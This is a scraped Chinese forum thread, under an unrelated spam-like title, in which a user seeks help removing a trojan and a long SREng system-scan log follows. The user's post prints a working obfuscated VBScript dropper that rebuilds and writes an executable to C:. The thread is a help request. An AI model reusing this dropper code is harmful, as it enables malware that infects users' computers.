china 9178js.comf13f7是什么

来源:蜘蛛抓取(WebSpider) 时间:2016-09-18 18:59 标签: 7136 9178 6104
查看: 2387|回复: 10
trojan.win32.vb.eks有人会杀吗?
在C盘会生成一个任意名字的.exe文件,以及2个.vbs文件,卡巴报EXE文件trojan.win32.vb.eks病毒,自动杀掉,.VBS文件还在而且会增加体积,删除后会再生,卡巴继续报毒,系统会时不时多一个CMD.EXE进程。
全盘查毒未有发现。网上找了下都说是跟上网有关,断网就不会报毒了,但是没人知道原因和杀法。
附其中一个VBS文件的代码,另一个打开了全是数字字母什么的,有达人来解决吗?
oN ErROR reSUmE nexT:S=1:Do:sEt G=CREaTeoBjeCt(&ScrIptiNG.fILESYSTEMObJECT&):do WHILe G.filEexISTs(&C:\flznfi.vbs&)=fALSe:wSCRIPT.sleep(1000):LOOp:SEt f=g.opEntExtfILE(&C:\flznfi.vbs&,1):do WHile F.ATenDoFStREam=fALSe:l=f.REAdLiNe:O=leN(L):n=LEFt(L,2):SElecT CAsE trUE:caSe ISnUmeRIc(N)=FAlSe:casE o=3947+3 ANd InT(N)=S:E=e+miD(L,3,3947):s=S+1:cAse o=3671+3 and iNt(n)=S:E=E+MId(l,3,3671):s=S+1:eNd sElecT:lOop:F.ClOSe:If 60+1=S THEn:J=len(E)/2:SeT V=CreaTEoBJECT(&aDOdB.REcoRDset&):v.fiElds.aPPeNd &m&,205,j:V.oPeN:v.ADdnew:V(&M&)=E:v.upDATe:E=V(&m&).gETcHUNK(j):wiTh CREaTeOBJECt(&AdOdB.STrEam&):.MODe=3:.Type=1:.OpeN():.write e:.SAVeTOFilE &C:\qqionjy.exe&,2:enD wItH:wSCript.qUiT:eNd iF:WSCRIpT.Sleep(200):LoOp
IllusionWing
请使用Sreng扫描日志之后发上来。
最好吧文件发上来看看
spaceplane
没Sreng日志神仙也救不了你
windows清理助手
SREngLOG 有,达人来帮忙看看
,14:12:56
System Repair Engineer 2.6.12.1018
Smallfrogs ()
Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能
以下内容被选中:
& & 所有的启动项目(包括注册表、启动文件夹、服务等)
& & 浏览器加载项
& & 正在运行的进程(包括进程模块信息)
& & 文件关联
& & Winsock 提供者
& & Autorun.inf
& & HOSTS 文件
& & 进程特权扫描
启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
& & &ctfmon.exe&&C:\WINDOWS\system32\ctfmon.exe&&&[(Verified)Microsoft Windows Publisher]
& & &AlfaClock Classic&&&D:\Program Files\AlfaClock\AlfaClock.exe& /startup&&&[AlfaSoft Research Labs]
& & &RAMSaverPro&&c:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe&&&[]
& & &Fetion&&D:\Program Files\China Mobile\Fetion\Fetion.exe&&&[China Mobile]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
& & &load&&&&&[N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
& & &cFosSpeed&&C:\Program Files\cFosSpeed\cFosSpeed.exe&&&[cFos Software GmbH]
& & &AVP&&&C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe&&&&[(Verified)Kaspersky Lab]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
& & &shell&&Explorer.exe&&&[(Verified)Microsoft Windows Component Publisher]
& & &Userinit&&C:\WINDOWS\system32\userinit.exe,&&&[(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
& & &AppInit_DLLs&&&&&[N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
& & &UIHost&&logonui.exe&&&[(Verified)Microsoft Windows Publisher]
[HKEY_CURRENT_USER\Control Panel\Desktop]
& & &SCRNSAVE.EXE&&C:\WINDOWS\system32\LCD-SVR.SCR&&&[Gate2.NET, contact: ]
==================================
启动文件夹
[adsl]
&&&C:\Documents and Settings\cyscys\「开始」菜单\程序\启动\adsl.lnk --&&&[File is missing]&&N&
==================================
服务
[Ati HotKey Poller / Ati HotKey Poller][Stopped/Disabled]
&&&C:\WINDOWS\system32\Ati2evxx.exe&&ATI Technologies Inc.&
[ATI Smart / ATI Smart][Stopped/Manual Start]
&&&C:\WINDOWS\system32\ati2sgag.exe&&&
[卡巴斯基反病毒软件 7.0 / AVP][Running/Auto Start]
&&&&C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe& -r&&Kaspersky Lab&
[cFosSpeed System Service / cFosSpeedS][Running/Auto Start]
&&&&C:\Program Files\cFosSpeed\spd.exe& -service&&cFos Software GmbH&
[Clip Book server / Clip Book server][Stopped/Auto Start]
&&&C:\Program Files\Internet &&(File is missing)&
[Cmb WebProtect Support / CMBWPS][Running/Auto Start]
&&&C:\Program Files\CMBCHINA\WebProtect\WPService.exe /start&&China Merchants Bank&
[Google Updater Service / gusvc][Stopped/Disabled]
&&&&C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe&&&Google&
[ServiceLayer / ServiceLayer][Stopped/Manual Start]
&&&&C:\Program Files\PC Connectivity Solution\ServiceLayer.exe&&&Nokia.&
[Windows Live Setup Service / WLSetupSvc][Stopped/Manual Start]
&&&&C:\Program Files\Windows Live\installer\WLSetupSvc.exe&&&Microsoft Corporation&
==================================
驱动程序
[标准 IDE/ESDI 硬盘控制器 / atapi][Running/Boot Start]
&&&\SystemRoot\system32\DRIVERS\atapi.sys&&N/A&
[ati2mtag / ati2mtag][Running/Manual Start]
&&&system32\DRIVERS\ati2mtag.sys&&ATI Technologies Inc.&
[cFosSpeed Miniport / cFosSpeed][Running/Manual Start]
&&&system32\DRIVERS\cfosspeed.sys&&cFos Software GmbH&
[CMB8100 / CMB8100][Running/Auto Start]
&&&\??\C:\WINDOWS\system32\Drivers\CertClient.dat&&N/A&
[CMBProtector / CMBProtector][Running/Auto Start]
&&&\??\C:\WINDOWS\system32\Drivers\CMBProtector.dat&&N/A&
[d346bus / d346bus][Running/Boot Start]
&&&\SystemRoot\system32\DRIVERS\d346bus.sys&&&
[d346prt / d346prt][Running/Boot Start]
&&&\SystemRoot\System32\Drivers\d346prt.sys&&&
[VIA PCI 10/100Mb Fast Ethernet Adapter NT Driver / FETNDIS][Stopped/Manual Start]
&&&system32\DRIVERS\fetnd5.sys&&VIA Technologies, Inc.&
[kl1 / kl1][Running/Boot Start]
&&&\SystemRoot\system32\drivers\kl1.sys&&Kaspersky Lab&
[klif / klif][Running/System Start]
&&&\??\C:\WINDOWS\system32\drivers\klif.sys&&Kaspersky Lab&
[Kaspersky Anti-Virus NDIS Filter / klim5][Running/Manual Start]
&&&system32\DRIVERS\klim5.sys&&Kaspersky Lab&
[Nokia USB Phone Parent / nmwcd][Stopped/Manual Start]
&&&system32\drivers\nmwcd.sys&&Nokia&
[Nokia USB Generic / nmwcdc][Stopped/Manual Start]
&&&system32\drivers\nmwcdc.sys&&Nokia&
[Nokia USB Port / nmwcdcj][Stopped/Manual Start]
&&&system32\drivers\nmwcdcj.sys&&Nokia&
[Nokia USB Modem / nmwcdcm][Stopped/Manual Start]
&&&system32\drivers\nmwcdcm.sys&&Nokia&
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
&&&system32\DRIVERS\ptilink.sys&&Parallel Technologies, Inc.&
[Realtek RTL8029(AS)-based PCI Ethernet Adapter NT Driver / rtl8029][Running/Manual Start]
&&&system32\DRIVERS\RTL8029.SYS&&Realtek Semiconductor Corporation&
[Secdrv / Secdrv][Stopped/Manual Start]
&&&system32\DRIVERS\secdrv.sys&&N/A&
[viamraid / viamraid][Running/Boot Start]
&&&\SystemRoot\system32\DRIVERS\viamraid.sys&&VIA Technologies inc,.ltd&
[VIA AC'97 Audio Controller (WDM) / VIAudio][Running/Manual Start]
&&&system32\drivers\viaudio.sys&&VIA Technologies, Inc.&
[videX32 / videX32][Running/Boot Start]
&&&\SystemRoot\system32\DRIVERS\videX32.sys&&VIA Technologies, Inc.&
[WINIO / WINIO][Stopped/Manual Start]
&&&\??\D:\Program Files\按键精灵\winio.sys&&N/A&
==================================
浏览器加载项
[ThunderAtOnce Class]
&&{01443AEC-0FD1-40fd-9C87-E93D} &D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD&
[WebProtect]
&&{CA8-4C7C-B8FC063B} &C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank&
[]
&&{7E853D72-626A-48EC-A868-BA8D5E23E045} &, &
[Thunder Browser Helper]
&&{889D2FEB-98-1DD2C5261283} &D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD&
[TN插件]
&&{--B366-BAB0} &C:\WINDOWS\system32\TNBHO.dll, &
[Google Toolbar Helper]
&&{AA58ED58-01DD-4d91-8333-CF} &c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.&
[Google Toolbar Notifier BHO]
&&{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} &C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.&
[Web 反病毒统计]
&&{1FA94-4D71-9CA3-AA4ACF32ED8E} &C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\SCIEPlgn.dll, (Signed) Kaspersky Lab&
[信息检索(&R)]
&&{CC-41C8-B9BE-3C9C571A8263} &C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL, (Signed) Microsoft Corporation&
[&Google]
&&{--9B18-CD4F} &c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.&
[EditCtrl Class]
&&{488AB3-8F27-FA1AECAA8844} &C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) &
[UploadControl Control]
&&{52FF336D-A05D-4A14-A3A1-7B6B4B427F88} &C:\WINDOWS\system32\UPLOAD~1.OCX, 广州网易互动娱乐有限公司&
[163Uploader Control]
&&{-DC01-4E8F-BDE3-DCC7DBBAD6AE} &C:\WINDOWS\system32\163UPL~1.OCX, 广州网易互动娱乐有限公司&
[AxSubmitControl Class]
&&{8D9E0B29-563C--5FF2AE77E1D2} &C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, &
[SopCore Control]
&&{8FEFF364-6A5F--A3AC} &C:\PROGRA~1\SopCast\sopocx.ocx, &
[Shockwave Flash Object]
&&{D27CDB6E-AE6D-11CF-96B8-} &C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.&
[ThunderAtOnce Class]
&&{01443AEC-0FD1-40FD-9C87-E93D} &D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD&
[]
&&{09BA8F6D-CB54-424B-839C-C2A6C8E6B436} &, &
[]
&&{0A155D3C-68E2-4215-A47A-E800A446447A} &, &
[EWA Control]
&&{18226BF8-DC0B-4D81-80E9-A41AE37BB73A} &C:\PROGRA~1\PPLive\SYNACA~2.OCX, (Signed) Synacast&
[]
&&{1FA94-4D71-9CA3-AA4ACF32ED8E} &, &
[Windows Media Player]
&&{22D6F312-B0F6-11D0-94AB-E95} &C:\WINDOWS\system32\wmpdxm.dll, (Signed) Microsoft Corporation&
[&Google]
&&{--9B18-CD4F} &c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.&
[HTML Document]
&&{F9-11CF-8FD0-00AA00686F13} &%SystemRoot%\system32\mshtml.dll, (Signed) N/A&
[xsey.lnuvsm]
&&{2BD1B2F3-CF67-E-FCDCD8F103F5} &, &
[DHTML Edit Control Safe for Scripting for IE5]
&&{2D360201-FFF5-11D1-8D03-00A0C959BC0A} &C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx, (Signed) Microsoft Corporation&
[Tabular Data Control]
&&{333C7BC4-460F-11D0-BC04-} &C:\WINDOWS\system32\tdc.ocx, (Signed) Microsoft Corporation&
[]
&&{3AA9CF07-DF20-48FF-98BE-DED276E40146} &, &
[Thunder Agent Class]
&&{-8FB2-4B3B-B29B-8B919B0EACCE} &D:\Program Files\Thunder Network\Thunder\ComDlls\ThunderAgent_Now.dll, Thunder Networking Technologies,LTD&
[EditCtrl Class]
&&{488AB3-8F27-FA1AECAA8844} &C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) &
[HHCtrl Object]
&&{52A2AAAE-085D-4187-97EA-8C30DB990436} &C:\WINDOWS\system32\hhctrl.ocx, (Signed) Microsoft Corporation&
[WebProtect]
&&{CA8-4C7C-B8FC063B} &C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank&
[]
&&{5CB840B5-A94E-4AD9-B785-76} &, &
[WUWebControl Class]
&&{6414512B-B978-451D-A0D8-FCFDF33E833C} &C:\WINDOWS\system32\wuweb.dll, (Signed) Microsoft Corporation&
[XMP Class]
&&{8-4C41-AACC-52D4D7845851} &C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xplayer.dll_1_work, &
[XDRM]
&&{693571CB-54A3-4E90-9D52-EEAE} &C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work, &
[Windows Media Player]
&&{6BF52A52-394A-11D3-B153-00C04F79FAA6} &C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation&
[WangWangObj Class]
&&{6E213FC7-DD5A--D4CE} &D:\Program Files\Alisoft\WangWang\WangWangX4.dll, 阿里巴巴软件(上海)有限公司&
[]
&&{6E5E167B--B27F-0DDAB3484CF7} &, &
[Active Desktop Mover]
&&{72267F6A-A6F9-11D0-BC94-00C04FB67863} &%SystemRoot%\system32\SHELL32.dll, (Signed) N/A&
[AxInputControl Class]
&&{73E4740C-08EB-D0A7C9EE3CD} &C:\WINDOWS\DOWNLO~1\INPUTC~1.DLL, &
[MediaComm Class]
&&{1B-42AF-BDFE-46D26AF5EFF2} &d:\Program Files\Thunder Network\Thunder\Components\InMedia\MediaAddin14.dll, Thunder Networking Technologies,LTD&
[]
&&{78ABDC59-D8E7-44D3-9A76-9AA} &, &
[]
&&{7E853D72-626A-48EC-A868-BA8D5E23E045} &, &
[]
&&{7FC22A16-79E6--BD} &, &
[Microsoft Web 浏览器]
&&{A-11D0-A96B-00C04FD705A2} &C:\WINDOWS\system32\shdocvw.dll, (Signed) Microsoft Corporation&
[Thunder Browser Helper]
&&{889D2FEB-98-1DD2C5261283} &D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD&
[AxSubmitControl Class]
&&{8D9E0B29-563C--5FF2AE77E1D2} &C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, &
[SopCore Control]
&&{8FEFF364-6A5F--A3AC} &C:\PROGRA~1\SopCast\sopocx.ocx, &
[]
&&{CC-41C8-B9BE-3C9C571A8263} &, &
[TN插件]
&&{--B366-BAB0} &C:\WINDOWS\system32\TNBHO.dll, &
[RMGetLicense Class]
&&{A9FC132B-096D-460B-B7D5-1DB0FAE0C062} &C:\WINDOWS\system32\msnetobj.dll, (Signed) Microsoft Corporation&
[Google Toolbar Helper]
&&{AA58ED58-01DD-4D91-8333-CF} &c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.&
[Thunder DapCtrl]
&&{ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8} &d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapCtrl1.2.11.14.475.dll, ShenZhen Thunder Networking Technologies Ltd.&
[Microsoft Scriptlet Component]
&&{AE24FDAE-03C6-11D1-8B76-} &C:\WINDOWS\system32\mshtml.dll, (Signed) Microsoft Corporation&
[Google Toolbar Notifier BHO]
&&{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} &C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.&
[SearchAssistantOC]
&&{B45FF030--85DE-00C04FA35C89} &%SystemRoot%\system32\shdocvw.dll, (Signed) N/A&
[RDS.DataSpace]
&&{BD96C556-65A3-11D0-983A-00C04FC29E36} &C:\Program Files\Common Files\System\msadc\msadco.dll, (Signed) Microsoft Corporation&
[]
&&{CA5-11D4-BDB2-} &, &
[AUDIO__MP3 Moniker Class]
&&{CD3AFA76-B84F-48F0-9393-7EDC} &C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation&
[AUDIO__X_MS_WMA Moniker Class]
&&{CD3AFA84-B84F-48F0-9393-7EDC} &C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation&
[Shockwave Flash Object]
&&{D27CDB6E-AE6D-11CF-96B8-} &C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.&
[]
&&{DCF61-42ED-AECE-63F5EEF647C5} &, &
[Thunder DapPlayer]
&&{EEDD6FF9-13DE-496B-9A1C-D78B} &d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapPlayer3.0.40.64.475.dll, ShenZhen Thunder Networking Technologies Ltd.&
[XPPlayer Class]
&&{F3E70CEA-956E-49CC-B444-73AFE593AD7F} &C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\pplayer.dll_1_work, Thunder&
[]
&&{FB5FD2-BB9E-00C04F795683} &, &
[使用迅雷下载]
&&&D:\Program Files\Thunder Network\Thunder\Program\geturl.htm, N/A&
[使用迅雷下载全部链接]
&&&D:\Program Files\Thunder Network\Thunder\Program\getallurl.htm, N/A&
[导出到 Microsoft Office Excel(&X)]
&&&res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A&
[用比特精灵下载(&B)]
&&&D:\Program Files\BitSpirit\bsurl.htm, N/A&
[设为 Messenger Live 头像]
&&&C:\Program Files\MSNShell\Bin\SetMSNDP.htm, N/A&
==================================
正在运行的进程
[PID: 1000 / SYSTEM][\SystemRoot\System32\smss.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1164 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1196 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
& & [C:\WINDOWS\system32\Ati2evxx.dll]&&[ATI Technologies Inc., 6.14.10.4176]
& & [C:\WINDOWS\system32\msacm32.drv]&&[Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
& & [C:\WINDOWS\system32\msadp32.acm]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1240 / SYSTEM][C:\WINDOWS\system32\services.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1252 / SYSTEM][C:\WINDOWS\system32\lsass.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1408 / SYSTEM][C:\WINDOWS\system32\svchost.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1508 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1620 / SYSTEM][C:\WINDOWS\System32\svchost.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1780 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1884 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_gdr.9)]
& & [C:\WINDOWS\system32\mdimon.dll]&&[Microsoft Corporation, 11.3.2175.0]
& & [C:\WINDOWS\System32\spool\PRTPROCS\W32X86\mdippr.dll]&&[Microsoft Corporation, 11.3.2175.0]
[PID: 372 / cyscys][C:\WINDOWS\Explorer.EXE]&&[Microsoft Corporation, 6.00. (xpsp_sp2_gdr.4)]
& & [D:\Program Files\AlfaClock\TrayClock.dll]&&[N/A, ]
& & [C:\WINDOWS\system32\msacm32.drv]&&[Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
& & [D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll]&&[Thunder Networking Technologies,LTD, 1.0.5.29]
& & [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll]&&[Thunder Networking Technologies,LTD, 1, 0, 0, 18]
& & [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll]&&[Thunder Networking Technologies,LTD, 1, 0, 0, 16]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]&&[Kaspersky Lab, 7.0.1.325]
[PID: 520 / cyscys][C:\Program Files\cFosSpeed\cFosSpeed.exe]&&[cFos Software GmbH, 3.11.1177]
[PID: 576 / cyscys][C:\WINDOWS\system32\ctfmon.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 604 / cyscys][D:\Program Files\AlfaClock\AlfaClock.exe]&&[AlfaSoft Research Labs, 1.8.2.722]
& & [D:\Program Files\AlfaClock\TrayClock.dll]&&[N/A, ]
& & [C:\WINDOWS\system32\msacm32.drv]&&[Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
[PID: 632 / cyscys][C:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe]&&[N/A, ]
[PID: 728 / SYSTEM][C:\Program Files\cFosSpeed\spd.exe]&&[cFos Software GmbH, 3.11.1177]
[PID: 760 / SYSTEM][C:\Program Files\CMBCHINA\WebProtect\WPService.exe]&&[China Merchants Bank, 1, 0, 0, 1]
& & [C:\Program Files\CMBCHINA\WebProtect\WebProtectPlus.dll]&&[China Merchants Bank, 1, 0, 0, 1]
[PID: 864 / SYSTEM][C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE]&&[Microsoft Corporation, 7.00.9466]
& & [C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\2052\mdmui.dll]&&[Microsoft Corporation, 7.00.9466]
[PID: 1036 / SYSTEM][C:\WINDOWS\system32\svchost.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 2172 / cyscys][D:\Program Files\BitSpirit\BitSpirit.exe]&&[LANSPIRIT.NET, 3.3.2.100]
& & [D:\Program Files\BitSpirit\BSOPLIB.DLL]&&[, 1, 0, 0, 3]
& & [C:\WINDOWS\system32\msacm32.drv]&&[Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
[PID: 3260 / cyscys][C:\WINDOWS\explorer.exe]&&[Microsoft Corporation, 6.00. (xpsp_sp2_gdr.4)]
& & [D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll]&&[Thunder Networking Technologies,LTD, 1.0.5.29]
& & [D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll]&&[Thunder Networking Technologies,LTD, 5, 0, 8, 55]
& & [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll]&&[Thunder Networking Technologies,LTD, 1, 0, 0, 18]
& & [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll]&&[Thunder Networking Technologies,LTD, 1, 0, 0, 16]
& & [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]&&[Microsoft Corporation, 11.0.5510]
& & [d:\Program Files\WinRAR\rarext.dll]&&[N/A, ]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\ShellEx.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [d:\Program Files\EditPlus 3\eppshell.dll]&&[N/A, ]
& & [C:\WINDOWS\system32\contmenu.dll]&&[N/A, ]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Nokia\Nokia PC Suite 6\phonebrowser.dll]&&[Nokia, 6, 85, 89, 5]
& & [C:\Program Files\Nokia\Nokia PC Suite 6\PCSCM.dll]&&[Nokia, 6, 85, 107, 6]
& & [C:\Program Files\Nokia\Nokia PC Suite 6\Lang\PhoneBrowser_chi-sc.nlr]&&[Nokia, 6, 85, 59, 0]
& & [C:\Program Files\Nokia\Nokia PC Suite 6\Resource\PhoneBrowser_Nokia.ngr]&&[Nokia, 6, 85, 17, 0]
[PID: 2276 / cyscys][C:\Program Files\Windows Live\Messenger\msnmsgr.exe]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\Windows Live\Messenger\MSNCore.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\Windows Live\Messenger\msidcrl40.dll]&&[Microsoft Corporation, 4.100.313.1]
& & [C:\Program Files\Windows Live\Messenger\ContactsUX.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\Windows Live\Messenger\CRYPTNET.dll]&&[N/A, ]
& & [C:\Program Files\MSNShell\Bin\ShellDll02.dll]&&[MSNShell Team, 4.3.11.12]
& & [C:\Program Files\Windows Live\Messenger\msgslang.8.5..dll]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\Windows Live\Messenger\msgsres.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\MSNShell\Bin\ShellDll.dll]&&[N/A, ]
& & [C:\Program Files\Windows Live\Messenger\MSGSWCAM.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\WINDOWS\system32\sirenacm.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\WINDOWS\system32\msdmo.dll]&&[, ]
& & [C:\Program Files\Windows Live\Messenger\lmcdata.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\Windows Live\Messenger\contact.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\Windows Live\Messenger\custsat.dll]&&[Microsoft Corporation, 9.0. (srv03_sp1_qfe.3)]
& & [C:\Program Files\Windows Live\Messenger\abssm.dll]&&[Microsoft Corporation, 8.5.]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\WINDOWS\system32\msacm32.drv]&&[Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
& & [C:\WINDOWS\system32\SOGOUPY.IME]&&[ Inc., 3, 1, 0, 0]
& & [C:\Program Files\SogouInput\Plugin\SgImeWord.dll]&&[, 1, 0, 0, 31]
& & [C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx]&&[Adobe Systems, Inc., 9,0,115,0]
[PID: 2272 / cyscys][C:\WINDOWS\system32\taskmgr.exe]&&[Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 3904 / cyscys][D:\Program Files\maxthon\Maxthon.exe]&&[Maxthon International Ltd., 1, 5, 9, 80]
& & [D:\Program Files\maxthon\maxzlib.dll]&&[ , 1, 0, 0, 2]
& & [C:\WINDOWS\system32\odbcbcp.dll]&&[Microsoft Corporation, 7.00 (xpsp_sp2_rtm.8)]
& & [D:\Program Files\maxthon\Services\RealTime\real_time.dll]&&[, 1, 0, 0, 1]
& & [C:\WINDOWS\system32\SOGOUPY.IME]&&[ Inc., 3, 1, 0, 0]
& & [C:\Program Files\SogouInput\Plugin\SgImeWord.dll]&&[, 1, 0, 0, 31]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl]&&[Kaspersky Lab, 7.0.1.325]
